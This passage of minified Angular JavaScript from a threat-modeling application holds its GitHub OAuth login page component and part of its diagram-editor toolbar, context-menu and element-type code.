e=B();C(2),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),C(1),ct("",re(4,12,"pages.login.loginViaGithub")," "),C(5),V("ngModel",e.dataService.KeepUserSignedIn),C(1),ke(re(10,14,"pages.login.keep_signed_in")),C(3),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),C(1),ke(re(14,16,"pages.login.loginAsGuest"))}}function Uct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"h1"),s(3),oe(4,"translate"),u(),s(5,"\n\n            "),m(6,"button",9),he("click",function(){return be(e),Me(B().dataService.LogOut())}),s(7,"\n              Logout\n            "),u(),s(8,"\n          "),Mt()}if(2&t){const e=B();C(3),za("",re(4,2,"pages.login.welcome")," ",e.dataService.UserDisplayName,"!")}}const qct=[{path:"login",component:(()=>{class t{constructor(e,i,n,r){this.theme=e,this.route=i,this.dataService=n,this.electronService=r}ngOnInit(){this.electronService.isElectron?this.electronService.ipcRenderer.on("oncode",(e,i)=>{this.dataService.LogIn(i)}):this.route.queryParams.subscribe(e=>{null!=e.code&&this.dataService.LogIn(e.code)})}onInstallAppClick(){window.open("https://github.com/apps/thingthreatmodeler","_blank")}onForkDataClick(){window.open("https://github.com/SecSimon/TTM-data","_blank")}onGithubLogin(){this.electronService.isElectron?window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri=http://localhost:4200/login","_self"):window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri="+window.location.href.toString(),"_self")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Tl),Ee(Yi),Ee(ST))},t.\u0275cmp=Wt({type:t,selectors:[["app-login"]],decls:111,vars:37,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/login",2,"width","100%","height","100%"],[1,"column","vertical-center"],[3,"innerHTML"],["orientation","vertical"],["stepper",""],["matStepLabel",""],["mat-button","",3,"click"],["mat-button","","matStepperNext",""],["mat-button","","matStepperPrevious",""],["mat-button","",3,"routerLink"],[1,"vertical-center-right"],[4,"ngIf"],[1,"login",2,"margin-bottom","10px",3,"click"],["color","primary",2,"margin-left","10px",3,"ngModel","ngModelChange"],[1,"login",2,"margin-top","25px",3,"click"]],template:function(e,i){1&e&&(s(0,"\n\n"),m(1,"div",0),s(2,"\n  "),m(3,"mat-drawer-container",1),s(4,"\n    "),m(5,"mat-drawer",2),s(6,"\n      "),it(7,"app-side-nav",3),s(8,"\n    "),u(),s(9,"\n\n    "),m(10,"mat-drawer-content"),s(11,"\n      "),m(12,"div"),s(13,"\n        "),m(14,"div",4),s(15,"\n          "),m(16,"h1"),s(17),oe(18,"translate"),u(),s(19,"\n          "),it(20,"p",5),oe(21,"translate"),s(22,"\n          "),m(23,"mat-stepper",6,7),s(25,"\n            "),m(26,"mat-step"),s(27,"\n              "),ne(28,Fct,2,3,"ng-template",8),s(29,"\n              "),it(30,"p",5),oe(31,"translate"),s(32,"\n              "),m(33,"div"),s(34,"\n                "),m(35,"button",9),he("click",function(){return i.onForkDataClick()}),s(36,"\n                  Use this template\n                  "),m(37,"mat-icon"),s(38,"open_in_new"),u(),s(39,"\n                "),u(),s(40,"\n              "),u(),s(41,"\n              "),m(42,"div"),s(43,"\n                "),m(44,"button",10),s(45),oe(46,"translate"),u(),s(47,"\n              "),u(),s(48,"\n            "),u(),s(49,"\n            "),m(50,"mat-step"),s(51,"\n              "),ne(52,Vct,2,3,"ng-template",8),s(53,"\n              "),it(54,"p",5),oe(55,"translate"),s(56,"\n              "),m(57,"div"),s(58,"\n                "),m(59,"button",9),he("click",function(){return i.onInstallAppClick()}),s(60,"\n                  Install\n                  "),m(61,"mat-icon"),s(62,"open_in_new"),u(),s(63,"\n                "),u(),s(64,"\n              "),u(),s(65,"\n              "),m(66,"div"),s(67,"\n                "),m(68,"button",11),s(69),oe(70,"translate"),u(),s(71,"\n                "),m(72,"button",10),s(73),oe(74,"translate"),u(),s(75,"\n              "),u(),s(76,"\n            "),u(),s(77,"\n            "),m(78,"mat-step"),s(79,"\n              "),ne(80,Bct,2,3,"ng-template",8),s(81,"\n              "),it(82,"p",5),oe(83,"translate"),s(84,"\n              "),m(85,"button",9),he("click",function(){return i.onGithubLogin()}),s(86),oe(87,"translate"),u(),s(88,"\n              "),m(89,"button",12),s(90),oe(91,"translate"),u(),s(92,"\n              "),it(93,"br"),s(94,"\n            "),u(),s(95,"\n          "),u(),s(96,"\n        "),u(),s(97,"\n        "),m(98,"div",13),s(99,"\n          "),ne(100,Hct,16,18,"ng-container",14),s(101,"\n          "),ne(102,Uct,9,4,"ng-container",14),s(103,"\n        "),u(),s(104,"\n      "),u(),s(105,"\n    "),u(),s(106,"\n  "),u(),s(107,"\n  "),it(108,"app-status-bar"),s(109,"\n"),u(),s(110,"\n")),2&e&&(C(14),Ct("first-column-light",!i.theme.IsDarkMode)("first-column-dark",i.theme.IsDarkMode),C(3),ke(re(18,17,"pages.login.create_acc")),C(3),V("innerHTML",re(21,19,"pages.login.pretexthtml"),Uc),C(10),V("innerHTML",re(31,21,"pages.login.step1.deschtml"),Uc),C(15),ke(re(46,23,"tour.next")),C(9),V("innerHTML",re(55,25,"pages.login.step2.deschtml"),Uc),C(15),ke(re(70,27,"tour.prev")),C(4),ke(re(74,29,"tour.next")),C(9),V("innerHTML",re(83,31,"pages.login.step3.deschtml"),Uc),C(4),ct("\n                ",re(87,33,"pages.login.loginViaGithub"),"\n              "),C(3),V("routerLink","/home"),C(1),ct("\n                ",re(91,35,"pages.login.goToProjects"),"\n              "),C(10),V("ngIf",!i.dataService.IsLoggedIn),C(2),V("ngIf",i.dataService.IsLoggedIn))},dependencies:[Ri,Ta,Ea,oa,_u,gu,Nd,br,da,YV,mA,JV,pye,_ye,pf,_f,x1,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column[_ngcontent-%COMP%]{float:left;width:50%;padding-left:10px;padding-right:10px;justify-content:center;align-items:center}.first-column-light[_ngcontent-%COMP%]{border-right-color:#000;border-right-style:solid;border-right-width:1px}.first-column-dark[_ngcontent-%COMP%]{border-right-color:#fff;border-right-style:solid;border-right-width:1px}.vertical-center[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;transform:translateY(-50%)}.vertical-center-right[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;left:75%;transform:translate(-50%,-50%)}.login[_ngcontent-%COMP%]{border-radius:10px;padding:10px}.login-hover-light[_ngcontent-%COMP%]:hover{background-color:#0000000d}.login-hover-dark[_ngcontent-%COMP%]:hover{background-color:#ffffff0d}"]}),t})()}];let Gct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(qct),Ms]}),t})(),jct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,Gct]}),t})();const Qct=[{path:"modeling",component:zG}];let AZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Qct),Ms]}),t})();var Ei=de(4968);const $ct=["ctxMenu"],Kct=["zoomSelect"];function Xct(t,a){if(1&t&&(fi(),it(0,"circle",69)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Yct(t,a){if(1&t&&(fi(),it(0,"circle",70)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Jct(t,a){if(1&t&&(fi(),it(0,"circle",71)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Zct(t,a){if(1&t&&(fi(),it(0,"circle",72)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}const elt=function(){return[3,4]};function tlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.FlowArrowPosition=3==n.Dia.FlowArrowPosition?5:3)}),oe(1,"translate"),s(2,"\n      "),it(3,"fa-icon",73),s(4,"\n    "),u()}if(2&t){const e=B();Ct("toolBtn-Selected",kr(6,elt).includes(e.Dia.FlowArrowPosition)),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosBoth")),C(3),V("icon",e.faArrowsAltH)}}function ilt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",3),he("click",function(){be(e);const n=B();return Me(n.Dia.FlowArrowPosition=2==n.Dia.FlowArrowPosition?5:2)}),oe(1,"translate"),s(2,"\n      "),it(3,"fa-icon",73),s(4,"\n    "),u()}if(2&t){const e=B();Ct("toolBtn-Selected",2==e.Dia.FlowArrowPosition),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosEnd")),C(3),V("icon",e.faLongArrowAltRight)}}function alt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.BendFlow=!n.Dia.BendFlow)}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"redo"),u(),s(5,"\n    "),u()}2&t&&(Ct("toolBtn-Selected",B().Dia.BendFlow),at("matTooltip",re(1,3,"pages.modeling.diagram.arrowBend")))}function nlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.ShowName=!n.Dia.ShowName)}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_rotation_none"),u(),s(5,"\n    "),u()}2&t&&(Ct("toolBtn-Selected",B().Dia.ShowName),at("matTooltip",re(1,3,"pages.modeling.diagram.showName")))}function olt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.TextIncrease())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_increase"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.textIncrease")),V("disabled",!e.selectedElement)}}function rlt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.TextDecrease())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_decrease"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.textDecrease")),V("disabled",!e.selectedElement)}}function slt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.AddTestCase())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),V("disabled",!e.selectedElement)}}function clt(t,a){if(1&t){const e=Ye();m(0,"button",74),he("click",function(){return be(e),Me(B().Dia.CancelCreateFlow())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"draw"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.cancelCreateFlow")),V("disabled",!e.Dia.IsCreatingFlow)}}function llt(t,a){1&t&&(m(0,"button",75),s(1,"Mnemonics"),u()),2&t&&(B(),V("matMenuTriggerFor",Ti(290)))}function dlt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n          "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(B().diagram.Settings.GenerationMnemonics[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",i.diagram.Settings.GenerationMnemonics[e.ID]),C(1),ct("\n            ",e.Name,"\n          ")}}function mlt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n          "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(B().diagram.Settings.GenerationRules[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",i.diagram.Settings.GenerationRules[e.ID]),C(1),ct("\n            ",e.Name,"\n          ")}}function ult(t,a){if(1&t&&(m(0,"option",76),s(1),oe(2,"number"),u()),2&t){const e=B();V("value",e.Zoom),C(1),ct("",function $k(t,a,e,i){const n=t+22,r=bi(),c=Lc(r,n);return ZC(r,n)?qk(r,fs(),a,c.transform,e,i,c):c.transform(e,i)}(2,2,100*e.Zoom,"1.0-0"),"%")}}function hlt(t,a){if(1&t&&(m(0,"span",84),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.GetProperty("Name"))}}function flt(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){return be(e),Me(B(3).Dia.AddTestCase())}),s(1,"\n          "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function plt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),ne(2,hlt,2,1,"span",80),s(3," \n        "),m(4,"button",81),he("click",function(){return be(e),Me(B(2).Dia.CopyElement())}),s(5,"\n          "),m(6,"mat-icon"),s(7,"content_copy"),u(),s(8,"\n          "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n        "),u(),s(13,"\n        "),m(14,"button",82),he("click",function(){return be(e),Me(B(2).Dia.PasteElement())}),s(15,"\n          "),m(16,"mat-icon"),s(17,"content_paste"),u(),s(18,"\n          "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n        "),u(),s(23,"\n        "),m(24,"button",81),he("click",function(){be(e);const n=B().item;return Me(B().Dia.OnDeleteElement(n))}),s(25,"\n          "),m(26,"mat-icon"),s(27,"delete"),u(),s(28,"\n          "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n        "),u(),s(33,"\n        "),m(34,"button",81),he("click",function(){return be(e),Me(B(2).Dia.AddThreat())}),s(35,"\n          "),m(36,"mat-icon"),s(37,"flash_on"),u(),s(38,"\n          "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n        "),u(),s(43,"\n        "),ne(44,flt,9,3,"button",83),s(45,"\n        "),m(46,"button",81),he("click",function(){return be(e),Me(B(2).Dia.AddCountermeasure())}),s(47,"\n          "),m(48,"mat-icon"),s(49,"security"),u(),s(50,"\n          "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n        "),u(),s(55,"\n        "),m(56,"button",81),he("click",function(){return be(e),Me(B(2).Dia.SendToBack())}),s(57,"\n          "),fi(),m(58,"svg",10),s(59,"\n            "),s(60,"\n            "),it(61,"rect",29),s(62,"\n            "),it(63,"rect",30),s(64,"\n            "),it(65,"rect",31),s(66,"\n            "),it(67,"rect",32),s(68,"\n            "),it(69,"rect",33),s(70,"\n          "),u(),s(71,"\n          "),ln(),m(72,"span"),s(73),oe(74,"translate"),u(),s(75,"\n        "),u(),s(76,"\n        "),m(77,"button",81),he("click",function(){return be(e),Me(B(2).Dia.SendBackwards())}),s(78,"\n          "),fi(),m(79,"svg",10),s(80,"\n            "),s(81,"\n            "),it(82,"rect",34),s(83,"\n            "),it(84,"rect",35),s(85,"\n            "),it(86,"rect",36),s(87,"\n          "),u(),s(88,"\n          "),ln(),m(89,"span"),s(90),oe(91,"translate"),u(),s(92,"\n        "),u(),s(93,"\n        "),m(94,"button",81),he("click",function(){return be(e),Me(B(2).Dia.BringForward())}),s(95,"\n          "),fi(),m(96,"svg",10),s(97,"\n            "),s(98,"\n            "),it(99,"rect",35),s(100,"\n            "),it(101,"rect",36),s(102,"\n            "),it(103,"rect",34),s(104,"\n          "),u(),s(105,"\n          "),ln(),m(106,"span"),s(107),oe(108,"translate"),u(),s(109,"\n        "),u(),s(110,"\n        "),m(111,"button",81),he("click",function(){return be(e),Me(B(2).Dia.BringToFront())}),s(112,"\n          "),fi(),m(113,"svg",10),s(114,"\n            "),s(115,"\n            "),it(116,"rect",30),s(117,"\n            "),it(118,"rect",31),s(119,"\n            "),it(120,"rect",32),s(121,"\n            "),it(122,"rect",33),s(123,"\n            "),it(124,"rect",37),s(125,"\n          "),u(),s(126,"\n          "),ln(),m(127,"span"),s(128),oe(129,"translate"),u(),s(130,"\n        "),u(),s(131,"\n        "),it(132,"mat-divider"),s(133,"\n      "),Mt()}if(2&t){const e=B().item,i=B();C(2),V("ngIf",e),C(8),ke(re(11,36,"general.Copy")),C(4),V("disabled",!i.Dia.CanCopy),C(6),ke(re(21,38,"general.Paste")),C(10),ke(re(31,40,"pages.modeling.diagram.deleteElement")),C(10),ke(re(41,42,"pages.modeling.diagram.addAttackScenario")),C(4),V("ngIf",i.dataService.Project.HasTesting),C(8),ke(re(53,44,"pages.modeling.diagram.addCountermeasure")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(74,46,"pages.modeling.diagram.sendBack")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(91,48,"pages.modeling.diagram.sendBackwards")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(108,50,"pages.modeling.diagram.bringForward")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(129,52,"pages.modeling.diagram.bringFront"))}}function _lt(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,plt,134,54,"ng-container",77),s(2,"\n      "),m(3,"button",78),he("click",function(){return be(e),Me(B().Dia.SaveImage())}),s(4,"\n        "),m(5,"mat-icon"),s(6,"save"),u(),s(7,"\n        "),m(8,"span"),s(9),oe(10,"translate"),u(),s(11,"\n      "),u(),s(12,"\n      "),m(13,"mat-menu",null,79),s(15,"\n        "),m(16,"button",7),s(17,"\n          "),m(18,"mat-slide-toggle",8),he("ngModelChange",function(n){return be(e),Me(B().Dia.SaveImageWithGrid=n)})("click",function(n){return n.stopPropagation()}),s(19),oe(20,"translate"),u(),s(21,"\n        "),u(),s(22,"\n      "),u(),s(23,"\n    ")}if(2&t){const e=Ti(14),i=B();C(1),V("ngIf",i.selectedElement),C(2),V("matMenuTriggerFor",e),C(6),ke(re(10,5,"pages.modeling.diagram.saveImage")),C(9),V("ngModel",i.Dia.SaveImageWithGrid),C(1),ct("\n            ",re(20,7,"pages.modeling.diagram.saveImageWithGrid"),"\n          ")}}const glt=function(){return[.33,.5,.66,.75,1,1.5,2,2.5,3]};var Zs=(()=>{return(t=Zs||(Zs={})).Mouse="mouse",t.Pan="pan",t.Move="move",Zs;var t})(),gf=(()=>{return(t=gf||(gf={}))[t.None=0]="None",t[t.Selecting=1]="Selecting",t[t.Moving=2]="Moving",gf;var t})(),ot=(()=>{return(t=ot||(ot={})).canvasID="canvasID",t.name="name",t.ID="ID",t.elementTypeID="elementTypeID",t.myType="myType",t.fa="fa",t.dfs="dfs",t.bendFlow="bendFlow",t.subTargetCheck="subTargetCheck",t.objectCaching="objectCaching",t.selectable="selectable",t.lockMovementX="lockMovementX",t.lockMovementY="lockMovementY",t.lockScalingX="lockScalingX",t.lockScalingY="lockScalingY",t.hasBorders="hasBorders",t.hasControls="hasControls",t.transparentCorners="transparentCorners",t.cornerColor="cornerColor",t.cornerSize="cornerSize",t.opacity="opacity",t.originX="originX",t.originY="originY",t._controlsVisibility="_controlsVisibility",t.path="path",t.pathOffset="pathOffset",t.strokeDashArray="strokeDashArray",t.visible="visible",t.perPixelTargetFind="perPixelTargetFind",t.targetFindTolerance="targetFindTolerance",t.fontSize="fontSize",t.p0ID="p0ID",t.p1ID="p1ID",t.p2ID="p2ID",t.arrowEID="arrowEID",t.arrowSID="arrowSID",t.textID="textID",t.textObjID="textObjID",t.t0ID="t0ID",t.flowID="flowID",t.fa1="fa1",t.fe1="fe1",t.fa2="fa2",t.fe2="fe2",ot;var t})(),wt=(()=>{return(t=wt||(wt={})).Process="P",t.DataStore="DS",t.DataStoreTop="DS-T",t.DataStoreBottom="DS-B",t.ExternalEntity="EE",t.TrustArea="TA",t.PhysicalLink="PL",t.Interface="I",t.DataFlowLine="DF-L",t.DataFlowCircle="DF-C",t.DataFlowPoint="DF-P",t.DataFlowArrowE="DF-AE",t.DataFlowArrowS="DF-AS",t.Device="DEV",t.DeviceReference="DEV-REF",t.DeviceLabel1="DEV-LBL1",t.DeviceLabel1Line="DEV-LBL1-L",t.DeviceLabel2="DEV-LBL2",t.DeviceLabel2Line="DEV-LBL2-L",t.DeviceLabel3="DEV-LBL3",t.DeviceLabel3Line="DEV-LBL3-L",t.DeviceLabel4="DEV-LBL4",t.DeviceLabel4Line="DEV-LBL4-L",t.MobileApp="APP",t.AppLabel1="APP-LBL1",t.AppLabel1Line="APP-LBL1-L",t.AppLabel2="APP-LBL2",t.AppLabel2Line="APP-LBL2-L",t.AppLabel3="APP-LBL3",t.AppLabel3Line="APP-LBL3-L",t.AppLabel4="APP-LBL4",t.AppLabel4Line="APP-LBL4-L",t.Interactor="ACT",t.InteractorHead="ACT-H",t.InteractorBody="ACT-B",t.InteractorArms="ACT-A",t.InteractorLeg1="ACT-L1",t.InteractorLeg2="ACT-L2",t.DeviceInterface="DEV-IF",t.SystemUseCase="SYSUC",t.SystemExternalEntity="SYSEE",t.Annotation="Annotation",t.ElementBorder="ElementBorder",t.ElementName="ElementName",t.ElementType="ElementType",t.ElementPhyElement="ElementPhyElement",t.FlowAnchor="FA",t.TextPosPoint="TXT-POS-P",t.GridLine="GL",wt;var t})(),_i=(()=>{return(t=_i||(_i={})).North="n",t.East="e",t.South="s",t.West="w",t.NorthWest="n-w",t.NorthEast="n-e",t.SouthEast="s-e",t.SouthWest="s-w",t.EasternNorth="en",t.EasternSouth="es",t.WesternNorth="wn",t.WesternSouth="ws",t.NorthernWest="nw",t.NorthernEast="ne",t.SouthernWest="sw",t.SouthernEast="se",_i;var t})();let D2=(()=>{class t{constructor(e,i,n,r,c,d){this.dataService=i,this.theme=n,this.dialog=r,this.locStorage=c,this.translate=d,this.mouseMode=Zs.Mouse,this.xMax=null,this.yMax=null,this.isInitalized=!1,this.isDarkMode=!1,this.blockSelectionChangedAfterReceive=!1,this.blockSelectionChangedAfterSend=!1,this.tmpFlowLine=null,this.tmpFlowLineEndpoint=null,this.blockCreateLine=!1,this.fontSizeConfigs=[{Name:11,Type:8},{Name:12,Type:9},{Name:14,Type:10},{Name:16,Type:12},{Name:18,Type:14},{Name:20,Type:16}],this.StrokeColor="black",this.StrokeWidth=2,this.BackgroundColor="black",this.CanvasScreenWidth=0,this.CanvasScreenHeight=0,this.SaveImageWithGrid=!1,this.mouseMovingState=gf.None,this.SelectionChanged=new Tt,this.NavTreeChanged=new Tt,this.subscriptionsLineType=[],this.subscriptionsFlowAnchor=[],this.subscriptionsScaling=[],this.isSaving=!1,this.overTimeoutBuffer={},this.arrowVisibilityBuffer={},this.seletedFlow=null,this.intersectionPairs=[],this.blockCheckingIntersection=!1,this.Diagram=e}get currentFontSizeConfig(){return this.fontSizeConfigs[this.FontSizeConfigIndex]}get CanCopy(){return null!=this.copyID}get MouseMode(){return this.mouseMode}set MouseMode(e){this.mouseMode=e,this.Canvas.selection=!1,e==Zs.Mouse?this.Canvas.isDragging&&(this.arrowVisibilityRestore(),this.Canvas.isDragging=!1):e==Zs.Pan?(this.arrowVisibilityStore(),this.Canvas.isDragging=!0):(this.SelectedElement=null,this.Canvas.selection=!0,this.mouseMovingState=gf.Selecting)}get ShowGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set ShowGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e;let c=d=>{d.forEach(T=>{(d=>{d[ot.myType]==wt.GridLine&&(d[ot.visible]=e)})(T),T._objects&&c(T._objects)})};c(this.Canvas.getObjects()),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_SHOW_GRID,JSON.stringify(n)),this.Canvas.requestRenderAll(),this.onCanvasModified()}get StickToGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set StickToGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_STICK_GRID,JSON.stringify(n))}get FlowArrowPosition(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS);return 